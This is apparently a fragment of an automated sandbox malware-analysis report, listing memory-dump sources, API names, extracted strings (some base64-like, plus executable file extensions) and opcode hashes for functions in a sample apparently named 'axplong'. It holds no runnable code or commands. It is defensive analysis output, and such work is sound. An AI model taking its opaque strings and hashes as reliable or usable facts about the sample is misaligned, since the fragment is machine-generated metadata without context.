                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                      • API String ID: 0-2390467879
                      • Opcode ID: 0a0a173eff093a72916578ebcb74d62ccb1463bbe23aa8bfd4614c9de1d9e257
                      • Instruction ID: d96dcee2ec1bfac919b25d3849e3494149e3cc5a99415f1e42fb6b19b600fb62
                      • Opcode Fuzzy Hash: 0a0a173eff093a72916578ebcb74d62ccb1463bbe23aa8bfd4614c9de1d9e257
                      • Instruction Fuzzy Hash: D902D271E10248EFEF14EFA8CC45BDEBBB5EF05304F544158E805A7282D7799A84DBA2
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 779b328f218f7a3d04750cd757ea1d4b111ad9888eb1c83eaa5c6c2437f11ed9
                      • Instruction ID: 6f9263dd8f90e7b7271cae56476f4589ad97d6e76050dc2848c714d9245bd8d0
                      • Opcode Fuzzy Hash: 779b328f218f7a3d04750cd757ea1d4b111ad9888eb1c83eaa5c6c2437f11ed9
                      • Instruction Fuzzy Hash: 3601C827A08716265718741E9C426BB27999BD2BB4719002BFD44F73C1DE89DC0279B1
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$Cnd_broadcast
                      • String ID:
                      • API String ID: 32384418-0
                      • Opcode ID: fd6aae7a636af50b41f557e20bb69e4aa839e502f74196cb628a5e3f6a379c44
                      • Instruction ID: 6674103da9fb60c5896d2757e430b7071a69868e06e27c7d2eb24d73937a7b9a
                      • Opcode Fuzzy Hash: fd6aae7a636af50b41f557e20bb69e4aa839e502f74196cb628a5e3f6a379c44
                      • Instruction Fuzzy Hash: 3CA1FFB0E006059FEF11EB64CD45BAAB7B8FF15724F048129E915D7291EB34EA04EBD1
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: 25fad510eae17b2dde6e8464fa2e442a364149944b6765f5634769e730e8c3b1
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 83B12472D002859FDB11CF2AC852BEFBBA5EF95350F14816AE445DB241D6389D42EFA0
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: c15625e5076f406b595ee22be9d8c663114db1e590a3983ff3ae7343249fb50d
                      • Instruction ID: 43115bf811ff19ed7f716948a4a6499a1b1a83bdfb58043af2d278ad06cf3eb4
                      • Opcode Fuzzy Hash: c15625e5076f406b595ee22be9d8c663114db1e590a3983ff3ae7343249fb50d
                      • Instruction Fuzzy Hash: FE216575D01109AFEF10EFA4DD419BEBB78EF48714F000065F601A7291DB74AD01ABE1